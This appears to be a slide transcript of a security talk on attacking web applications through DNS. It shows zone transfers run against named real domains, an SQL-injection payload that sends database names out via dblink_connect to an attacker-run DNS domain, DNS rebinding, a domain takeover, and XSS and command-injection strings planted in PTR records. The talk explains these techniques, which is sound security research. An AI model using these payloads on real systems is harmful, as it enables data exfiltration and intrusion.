Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 

4Developers: Dns vs webapp

  • 2. $ whoami •  Specjalista ds. Bezpieczeństwa Systemów IT •  Security Researcher •  Bug Hunter
  • 3. DNS
  • 4. DNS $ host -t ns . . name server l.root-servers.net. . name server f.root-servers.net. . name server g.root-servers.net. . name server d.root-servers.net. . name server j.root-servers.net. . name server a.root-servers.net. . name server k.root-servers.net. . name server m.root-servers.net. . name server c.root-servers.net. . name server e.root-servers.net. . name server b.root-servers.net. . name server h.root-servers.net. . name server i.root-servers.net.
  • 5. DNS
  • 6. DNS $ host -t ns pl. pl name server a-dns.pl. pl name server c-dns.pl. pl name server d-dns.pl. pl name server e-dns.pl. pl name server f-dns.pl. pl name server g-dns.pl. pl name server h-dns.pl. pl name server i-dns.pl.
  • 7. DNS
  • 8. DNS $ host -t ns wp.pl wp.pl name server ns2.wp.pl. wp.pl name server ns1.wp.pl. wp.pl name server ns1.task.gda.pl.
  • 9. DNS
  • 10. DNS $ host -t ns poczta.wp.pl poczta.wp.pl has no NS record $ host -t A poczta.wp.pl poczta.wp.pl has address 212.77.101.148
  • 11. Typy rekordów localhost IN A 127.0.0.1 ipv6 IN AAAA 2001:6d8:10:1667::6667 wow IN NS ns1.evil.com. go IN CNAME google.com. ala IN TXT "ala ma kota" 1 IN PTR 8.8.8.8 @ IN MX 10 smtp.evil.com. * IN A 142.62.4.13
  • 13. Information Disclosure •  svn.evil.com •  git.evil.com •  mysql.evil.com •  www2.evil.com •  test.evil.com •  beta.evil.com •  dev.evil.com •  vpn.evil.com
  • 14. Information Disclosure •  svn.evil.com •  git.evil.com •  mysql.evil.com •  www2.evil.com •  test.evil.com •  beta.evil.com •  dev.evil.com •  vpn.evil.com •  (…) $ host orange.pl orange.pl has address 80.48.169.1 orange.pl mail is handled by 5 mx5.orange.pl. orange.pl mail is handled by 0 mx.orange.pl. $ host 80.48.169.1 1.169.48.80.in-addr.arpa domain name pointer www2.orange.pl. $ host 80.48.169.2 2.169.48.80.in-addr.arpa domain name pointer mobile2.orange.pl. $ host 80.48.169.3 3.169.48.80.in-addr.arpa domain name pointer xwi2.orange.pl. (…)
  • 20. $ dig @fns2.42.pl televoice.pl axfr ; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr ; (2 servers found) ;; global options: +cmd televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl. 1361872990 10800 3600 604800 10800 televoice.pl. 86400 IN A 91.199.22.117 www.admin.televoice.pl. 86400 IN A 91.199.22.117 dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com. ftp.televoice.pl. 86400 IN A 91.199.22.117 kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com. old.televoice.pl. 86400 IN A 91.199.22.117 poczta.televoice.pl. 86400 IN A 91.199.22.117 sip.televoice.pl. 86400 IN A 195.162.16.201 sklep.televoice.pl. 86400 IN A 91.199.22.117 www.sklep.televoice.pl. 86400 IN A 91.199.22.117 www.sklep2.televoice.pl. 86400 IN A 91.199.22.117 sql.televoice.pl. 86400 IN A 91.199.22.117 sql2.televoice.pl. 86400 IN A 91.199.22.117 start.televoice.pl. 86400 IN CNAME ghs.google.com.
  • 21. Zone Transfer $ ./zone.pl gov.sl Checking ns1.neoip.com... failed. Checking ns2.neoip.com... OK! gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. ( 10800 ;serial 3600 ;refresh 604800 ;retry 21600 ;expire 3600 ) ;minimum gov.sl. 21600 IN NS ns2.neoip.com. gov.sl. 21600 IN NS ns1.neoip.com. statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com. statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com. tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM. pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com. pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com. mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com. mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com. mofa.gov.sl. 21600 IN NS ns1.abac.com.
  • 22. Zone Transfer bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. ( 2014082629 ;serial 21600 ;refresh 3600 ;retry 604800 ;expire 86400 ) ;minimum bi. 86400 IN TXT "Generation Time: 1409056444" bi. 86400 IN NS bi.cctld.authdns.ripe.net. bi. 86400 IN NS ns.nic.bi. bi. 86400 IN NS dns.princeton.edu. bi. 86400 IN NS ns1.nic.bi. bi. 86400 IN NS anyns.nic.bi. bi. 86400 IN NS ns-bi.afrinic.net. 100.bi. 86400 IN NS ns11.xincache.com. 100.bi. 86400 IN NS ns12.xincache.com. 101domain.bi. 86400 IN NS ns1.101domain.com. 101domain.bi. 86400 IN NS ns2.101domain.com. 101domain.bi. 86400 IN NS ns5.101domain.com. 101domains.bi. 86400 IN NS ns1.101domain.com. 101domains.bi. 86400 IN NS ns2.101domain.com. 101domains.bi. 86400 IN NS ns5.101domain.com.
  • 23. Zone Transfer an ao arpa bb bd bf bi bs bv capetown ci cv cw cy do durban eg er gp gq gt gy kh int joburg ke kg kw mg mo mp mw ni np pe pf pg py sc sj sl sv tel to zw -  ripe.net -  gnu.org -  poznan.pl
  • 27. Data Exfiltration •  Error Based SQL Injection
  • 28. Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection
  • 29. Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection •  Time-Based SQL Injection
  • 30. Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection •  Time-Based SQL Injection •  Data Exfiltration
  • 31. Data Exfiltration $ cat /etc/bind/named.conf (…) logging{ channel example_log { file "/var/log/dns.log" versions 3 size 2m; severity info; print-severity yes; print-time yes; print-category yes; }; category "queries" { example_log; }; };
  • 32. Data Exfiltration $ host onet.pl localhost Using domain server: Name: localhost Address: 127.0.0.1#53 Aliases: onet.pl has address 213.180.141.140 onet.pl mail is handled by 1 mx.poczta.onet.pl. $ tail -n 3 /var/log/dns.log 15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#46730: query: onet.pl IN A + (127.0.0.1) 15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#33283: query: onet.pl IN AAAA + (127.0.0.1) 15-Aug-2014 16:35:57.534 queries: info: client 127.0.0.1#41577: query: onet.pl IN MX + (127.0.0.1)
  • 33. Data Exfiltration INSERT (…) VALUES ('123'); è 123 INSERT (…) VALUES ('x'||user||'x'); è xtestx INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x
  • 34. Data Exfiltration INSERT (…) VALUES ('123'); è 123 INSERT (…) VALUES ('x'||user||'x'); è xtestx INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host=pwnd.uid0.pl user=1 password=2')) ||'x' ); DNS Request
  • 35. Data Exfiltration INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host='||(SELECT current_database())||'.uid0.pl user=1 password=2')) ||'x' ); DNS Request
  • 36. Data Exfiltration INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host='||(SELECT current_database())||'.uid0.pl user=1 password=2')) ||'x' ); DNS Request $ tail -n 1 /var/log/dns.log 26-Aug-2014 13:08:22.668 queries: info: client 173.194.90.82#38036: query: postgres.uid0.pl IN AAAA - ED (80.86.91.39)
  • 39. DNS Rebinding $ cat .htaccess <Files btc.txt> Order deny,allow Deny from all Allow from 127.0.0.1 </Files>
  • 43. DNS Rebinding Request nr 1 Request nr 2
  • 44. DNS Rebinding Request nr 1 Request nr 2 $ for a in `seq 1 10`; do host rebind.uid0.pl ; done rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39
  • 47. Domain Takeover $ host -t ns getclouder.com getclouder.com name server cumulus.getclouder.com. getclouder.com name server nimbus.getclouder.com.
  • 50. Domain Takeover $ host -t ns clouder.us clouder.us name server ns2.clev1.net. clouder.us name server ns1.clev1.net.
  • 51. Domain Takeover ns1.clev1.net has address 181.224.128.6 ns2.clev1.net has address 198.20.77.76
  • 52. Domain Takeover ns1.clev1.net has address 181.224.128.6 ns2.clev1.net has address 198.20.77.76 nimbus.getclouder.com has address 181.224.128.6 cumulus.getclouder.com has address 198.20.77.76
  • 53. Domain Takeover ns1.clev1.net has address 181.224.128.6 ns2.clev1.net has address 198.20.77.76 nimbus.getclouder.com has address 181.224.128.6 cumulus.getclouder.com has address 198.20.77.76
  • 56.
  • 58.
  • 59. $ dig +trace ns1.clev1.net (…) clev1.net. 172800 IN NS ns1.clev1.net. clev1.net. 172800 IN NS ns2.clev1.net. ;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms ns1.clev1.net. 86400 IN A 8.8.4.4 ns1.clev1.net. 86400 IN A 8.8.8.8 ns1.clev1.net. 86400 IN NS cumulus.getclouder.com. ns1.clev1.net. 86400 IN NS nimbus.getclouder.com. ;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms
  • 60.
  • 61.
  • 62. [16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com [16:28:52] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com [16:28:57] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com [16:28:57] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com [16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt [16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be [16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu [16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl [16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu [16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt [16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk [16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk [16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj [16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de [16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de [16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de [16:29:47] 181.224.128.4: proxying the response of type 'A' for ns2.siteground144.com [16:29:47] 181.224.128.4: proxying the response of type 'A' for ns1.siteground144.com
  • 67. Blind XSS $ host 77.254.88.134 134.88.254.77.in-addr.arpa domain name pointer 77-254-88-134.adsl.inetia.pl.
  • 68. Blind XSS $ host 77.254.88.134 134.88.254.77.in-addr.arpa domain name pointer 77-254-88-134.adsl.inetia.pl.
  • 70. Blind XSS $ host -t ns 88.254.77.in-addr.arpa 88.254.77.in-addr.arpa name server rumba.inetia.pl. 88.254.77.in-addr.arpa name server chacha.inetia.pl.
  • 72. Blind XSS zone "192/26.122.204.87.in-addr.arpa." IN { type master; allow-transfer { 109.173.165.151; }; check-names ignore; file "/etc/bind/87.204.122.210"; };
  • 73. Blind XSS $TTL 3600 @ IN SOA ns1.ropchain.org. admin.ropchain.org. ( 2014011417 ;serial 14400 ;refresh 3600 ;retry 604800 ;expire 10800 ;minimum ) @ IN NS ns1.ropchain.org. @ IN NS ns2.ropchain.org. 1 IN PTR ropchain.org. 210 IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl. 211 IN PTR a`uname`a.x.uid0.pl. 212 IN PTR ropchain.org.
  • 74. Blind XSS $ host 87.204.122.210 210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa. 210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http:// monitor.ropchain.org/xss.gif>f.x.uid0.pl.